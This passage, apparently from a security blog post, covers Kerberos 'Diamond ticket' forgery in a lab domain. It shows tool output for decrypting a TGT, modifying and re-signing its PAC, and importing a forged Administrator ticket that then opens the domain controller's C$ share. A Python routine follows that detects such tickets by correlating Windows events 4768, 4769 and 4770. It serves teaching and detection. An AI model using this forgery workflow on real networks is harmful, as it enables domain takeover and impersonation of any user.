[*] Extracted the service ticket session key from the ticket cache: t/DPs5uWq4XvahoWh0mK0Uv4hiwa/n5TyR4R7p06d6Y=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

      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
      Qk9SREVSR0FURS5MT0NBTA==

[*] Decrypting TGT
[*] Retreiving PAC
[*] Modifying PAC
[*] Signing PAC
[*] Encrypting Modified TGT

[*] base64(ticket.kirbi):

      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

[+] Ticket successfully imported!

C:\Tools>klist

Current LogonId is 0:0x192612

Cached Tickets: (1)

#0>     Client: Administrator @ BORDERGATE.LOCAL
        Server: krbtgt/BORDERGATE.LOCAL @ BORDERGATE.LOCAL
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x60a10000 -> forwardable forwarded renewable pre_authent name_canonicalize
        Start Time: 4/30/2024 18:16:45 (local)
        End Time:   5/1/2024 1:00:38 (local)
        Renew Time: 5/7/2024 18:00:38 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96
        Cache Flags: 0x1 -> PRIMARY
        Kdc Called:

C:\Tools>dir \\dc01\C$
 Volume in drive \\dc01\C$ has no label.
 Volume Serial Number is 343D-F2D0

 Directory of \\dc01\C$

08/05/2021  09:20    <DIR>          PerfLogs
28/04/2024  10:27    <DIR>          Program Files
08/05/2021  10:40    <DIR>          Program Files (x86)
28/04/2024  10:21    <DIR>          Users
28/04/2024  10:35    <DIR>          Windows
               0 File(s)              0 bytes
               5 Dir(s)  50,740,531,200 bytes free
```
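The correlation described at the start of this section, as an added example that is not part of the original post or of any named product: given 4768 (TGT requested) and 4769 (service ticket requested) events exported from domain-controller Security logs, flag every service-ticket request for an account that has no TGT request or renewal (4770) within the domain's MaxTicketAge. The event records are constructed for the lab domain on this page, and the field names are an assumption about how a SIEM exports them.

```python
from collections import defaultdict
from datetime import datetime, timedelta

TGT_EVENTS = {4768, 4770}  # 4768: TGT requested (AS-REQ); 4770: ticket renewed, which extends a TGT's life

# Constructed sample events (not real log data) shaped like the Security-log fields a SIEM exports;
# account and host names follow the lab domain on this page, times are UTC.
EVENTS = [
    {"time": "2024-04-29T13:50:00", "id": 4768, "account": "alice", "ip": "10.0.0.25"},
    {"time": "2024-04-29T13:52:10", "id": 4769, "account": "alice", "ip": "10.0.0.25",
     "service": "cifs/DC01.bordergate.local"},
    # Golden ticket: a service ticket is requested for Administrator although no DC ever issued
    # that account a TGT, because the forged TGT was injected straight into the logon session.
    {"time": "2024-04-29T14:06:00", "id": 4769, "account": "Administrator", "ip": "10.0.0.25",
     "service": "cifs/DC01.bordergate.local"},
    # bob's only TGT is 13 h old and was never renewed, so it cannot be the one behind the 4769; this
    # is the trace a forged TGT leaves when used long after the account's last genuine logon
    # (Mimikatz's ten-year default lifetime makes that the normal case).
    {"time": "2024-04-28T20:00:00", "id": 4768, "account": "bob", "ip": "10.0.0.31"},
    {"time": "2024-04-29T09:00:00", "id": 4769, "account": "bob", "ip": "10.0.0.31",
     "service": "ldap/DC01.bordergate.local"},
    # carol's TGT is just as old but was renewed (4770) 3.5 h before use, so it is legitimately covered.
    {"time": "2024-04-28T20:00:00", "id": 4768, "account": "carol", "ip": "10.0.0.40"},
    {"time": "2024-04-29T05:30:00", "id": 4770, "account": "carol", "ip": "10.0.0.40"},
    {"time": "2024-04-29T09:00:00", "id": 4769, "account": "carol", "ip": "10.0.0.40",
     "service": "cifs/FS01.bordergate.local"},
]

def tgs_without_tgt(events, max_ticket_age=timedelta(hours=10)):
    """Return (account, service, time) for every 4769 whose account has no 4768/4770 within the
    preceding max_ticket_age. Set max_ticket_age to the domain's MaxTicketAge (10 hours in the lab
    policy above): a TGT older than that has expired and cannot have produced the service ticket."""
    tgt_times = defaultdict(list)
    for e in events:
        if e["id"] in TGT_EVENTS:
            tgt_times[e["account"].lower()].append(datetime.fromisoformat(e["time"]))
    hits = []
    for e in sorted(events, key=lambda e: e["time"]):  # ISO-8601 strings sort chronologically
        if e["id"] != 4769:
            continue
        t = datetime.fromisoformat(e["time"])
        covered = any(t - max_ticket_age <= tg <= t for tg in tgt_times[e["account"].lower()])
        if not covered:
            hits.append((e["account"], e["service"], e["time"]))
    return hits
```

4768 is written only by the domain controller that served the AS-REQ, so feed the function events from every DC in the domain or it will flag tickets that were issued legitimately elsewhere.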
In Conclusion
Diamond tickets give an attacker the ability to assume the identity of any user in a domain, while being harder to detect than traditional Golden Ticket attacks. In addition, it is always worth ensuring that the tickets being generated blend in with the target environment.